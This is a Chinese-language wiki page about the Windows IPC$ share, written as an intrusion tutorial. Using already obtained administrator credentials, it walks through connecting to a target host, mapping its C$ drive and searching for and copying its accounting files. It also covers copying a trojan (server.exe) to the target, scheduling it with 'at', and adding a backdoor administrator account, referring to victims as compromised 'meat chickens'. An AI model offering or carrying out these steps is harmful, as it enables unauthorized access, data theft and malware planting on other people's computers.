IPC

来自DeerGrove Wiki
Administrator讨论 | 贡献2019年7月9日 (二) 13:35的版本 (创建页面,内容为“category:IS IPC$是Windows系统特有的一项管理功能,是微软公司为了方便用户使用计算机而设计的,主要用来远程管理计算机…”)
(差异) ←上一版本 | 最后版本 (差异) | 下一版本→ (差异)
跳转至: 导航搜索


IPC$是Windows系统特有的一项管理功能,是微软公司为了方便用户使用计算机而设计的,主要用来远程管理计算机的。但事实上使用这个功能最多的人不是网络管理员,而是“入侵者”!他们通过建立IPC$连接与远程主机实现通信和控制。通过IPC$连接的建立,入侵者能够做到:

  • 建立、拷贝、删除远程计算机文件;
  • 在远程计算机上执行命令。
  • 远程文件操作
  1. 相关知识
    1. 什么是IPC

IPC是英文Internet Process Connection的缩写,可以理解为“命名管道”资源,它是Windows操作系统提供的一个通信基础,用来在两台计算机进程之间建立通信连接,而IPC后面的“$”是Windows系统所使用的隐藏符号,因此“IPC$”表示IPC共享,但是是隐藏的共享。IPC$是Windows NT及Windows 2000/XP/2003特有的一项功能,通过这项功能,一些网络程序的数据交换可以建立在IPC上面,实现远程访问和管理计算机。打个比方,IPC连接就像是挖好的地道,通信程序就通过这个IPC地道访问目标主机。默认情况下IPC是共享的,除非手动删除IPC$。通过IPC$连接,入侵者就能够实现远程控制目标主机。因此,这种基于IPC的入侵也常常被简称为IPC入侵。

    1. 关于Windows操作系统的默认共享

为了配合IPC共享工作,Windows操作系统(不包括Windows 98系列)在安装完成后,自动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:\WINNT\)等,即为ADMIN$、C$、D$、E$等等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。在MS-DOS中键入“net share”命令来查看本机共享资源,如图2-1所示。

    1. DOS命令

下面介绍几个比较基础DOS命令,这些都是DOS中经常使用的命令。 DIR命令:列出当前路径下的文件,常常用来查看想要找的文件是否在该路径下,如图2-2所示。 CD命令:进入指定的目录。比如,想进入E盘中的CODE文件夹,则在E:\>下键入“CD CODE”命令,如图2-3所示。

  1. 常用的net命令:
  • net user:系统账号类操作;
  • net localgroup:系统组操作
  • net use:远程连接、映射操作
  • net send:信使命令
  • net time:查看远程主机系统时间
  • cls命令:清屏命令。
  • netstat -n命令:查看本机网络连接状态
  • nbtstat -a IP命令:查看指定IP主机的NetBIOS信息。



  • 实例:下面用实例来介绍如何建立和断开IPC$连接,看看入侵者是如何将远程磁盘映射到本地的。通过IPC$连接进行入侵的条件是已获得目标主机管理员账号和密码。
  1. 步骤一:单击“开始”→“运行”,在“运行”对话框中键入“CMD”命令,如图2-4所示。
  2. 步骤二:建立IPC$连接。
    • 使用命令:net use \\IP\IPC$ “PASSWD” /USER: “ADMIN”与目标主机建立IPC$连接。
    • 参数说明:
      • IP:目标主机的IP。
      • IPC$:前面已经介绍过。
      • PASSWD:已经获得的管理员密码。
      • ADMIN:已经获得的管理员账号。
    • 键入命令net use \\192.168.27.128\ipc$ ” ” /user:”administrator”,
  1. 步骤三:映射网络驱动器。
    • 使用命令:net use z: \\192.168.27.128\c$
    • 参数说明:
      • “\\192.168.27.128\c$”表示目标主机192.168.27.128上的C盘,其中“$”符号表示隐藏的共享。
      • “z:”表示将远程主机的C盘映射为本地磁盘的盘符。该命令表示把192.168.27.128这台目标主机上的C盘映射为本地的Z盘,
    • 映射成功后,打开“我的电脑”,会发现多出一个Z盘,上面写着“C$位于192.168.27.128上”,该磁盘即为目标主机的C盘,
  1. 步骤四:查找指定文件。用鼠标右键单击Z盘,在弹出菜单中选择“搜索”,查找关键字“账目”,等待一段时间后,然后将该文件拷贝、粘贴到本地磁盘,其拷贝、粘贴操作就像对本地磁盘进行操作一样。
  2. 步骤五:断开连接。键入“net use * /del”命令断开所有IPC$连接,参数说明:
    • “*”表示所有的连接。
    • “/Del”表示删除。
    • 另外,通过命令net use \\目标IP\ipc$ /del可以删除指定目标IP的IPC$连接。
  • 一些常用的Net命令与例子:
  1. 建立IPC连接的命令

Net use \\IP\ipc$ “” /user:username 例如: Net use \\127.0.0.1\ipc$ 123456 /user :administrator 这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机127.0.0.1建立ipc$空连接

  1. 删除IPC$空连接

Net use \\ip /del 例如: Net use \\127.0.0.1 /del 删除与主机127.0.0.1已经建立的Ipc$连接

  1. 启动关闭服务:

Net start //查看已经开启的服务 Net start servername Net stop servername 例如: Net start telnet //开启telnet服务 Net stop telnet //关闭telnet服务

  1. 启动关闭共享

Net shate ipc$ //开启ipc$默认共享 Net share ipc$ /del //关闭ipc$默认共享 Net share c=c:\ //完全共享c盘 Net share d=d:\ //删除完全共享的d盘

  1. 映射硬盘

Net use z: \\ip\c$ 例如: Net use z: \\127.0.0.1\c$ //把127.0.0.1的C盘映射成本机的z盘 说明:映射成功后,你在我的电脑里面里面就会多出一个硬盘Z,其实Z就是127.0.0.1的C盘! Net use z: /del //断开映射 入侵中的作用:把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了 成功实现的条件:必须与对方建立ipc$连接

  1. 远程复制文件_Copy

Copy e:\3389.exe \\127.0.0.1\c$ \\将本地的E盘下的3389.exe这个文件copy到对方系统的C盘根目录下 Copy在入侵中的作用:把本地文件复制到对方硬盘 Copy复制成功所需的条件:必须与主机建立ipc$连接

  1. 查看远程系统的时间

Net time \\IP Net time \\127.0.0.1 //查看远程主机127.0.0.1的本地时间 作用:得到对方时间好为自己计划任务种下木马做准备

  1. 远程运行程序

At \\ip time server.exe At \\127.0.0.1 12:30 c:\server.exe \\让主机在中午12:30分运行我们已经复制到他C盘根目录下的木马server.exe 在入侵中作用:这样我们就可以用我们的木马服务端来连接我们木马,,更好的使用图形方式来控制肉鸡.(推荐使用神气儿 ^_^)

  1. 添加管理员帐号:

Net user juntuan 1234 /add \\添加一个密码为1234名字为 军团的用户 Net localgroup administrators juntuan /add \\把juntuan这个用户添加到管 理员组 注意:有些系统的管理员组不是administrators你要根据实际情况来改,不过99.9%的系统的管理员组还是administrators的。 修改用户密码: Net user juntuan 1234 \\把用户juntuan的密码修改成1233。

  1. 远程登陆主机_telnet

telnet IP port 例如:telnet 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口 (当目标主机的端口是默认的23的时候我们不需要+端口即:telnet IP 就好)

  1. 传输文件命令_ftp

其实这个我个人觉得用途不大,毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢? 首先在CMD里面输入ftp 然后输入:open IP port 例如:open 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口 如何开启windows系统自带的ftp服务: Net start msftppsvc

  1. 查看文件夹的属性_cacls

Cacls xiaod //查看xiaod这个文件夹的属性 参数说明:F:(完全控制)R:(只读)C:(允许更改)W:(允许写入)N:(没有任何权限)

  1. 删除文件_del

Del是用来删除文件命令 首先进入你想删除的文件的目录 Del xiaod.txt //删除xiaod.txt这个个文件 Del xiaod.txt /f //强制删除xiaod.txt这个个文件(当该文件无法正常删除的时候使用该命令)

  1. finger命令

Finger是一个信息刺探命令一般在对方开启了79端口时命令使用 Finger –l user @computer 参数详解: -l 用长列表格式显示消息 User:指定用户的信息 成功实现的条件:对方必须安装tcp/ip协议

  1. 文件写入命令_echo:

Echo 你好 > index.htm //用你好来覆盖index.htm的内容 Echo 你好 >>index.htm //将“你好”添加到index.htm

  1. 写入注册表文件_regedit

Regedit /s filename.reg //s是写入参数

  1. 端口映射_chgport

Chgport 3=5 //将端口3映射到5 Chgport /d* //删除所有端口映射

  1. 文件映射_subst

Subst b:\ c:\winnt \\这个时候当你访问硬盘B的时候你就是访问了 c:\winnt目录

  1. 查看当前正在使用的帐号:

Query session //查看帐号

  1. 踢掉指定用:

Logoff id //注意ID,是在用query session查看到的用户的id而不是用户名。

  1. 发送消息给某用户或者内网主机

Net send hostname or /IP message 例如:net send xiaod or /127.0.0.1 hello!

取自“http://deermin.com/mwiki/index.php?title=IPC&oldid=263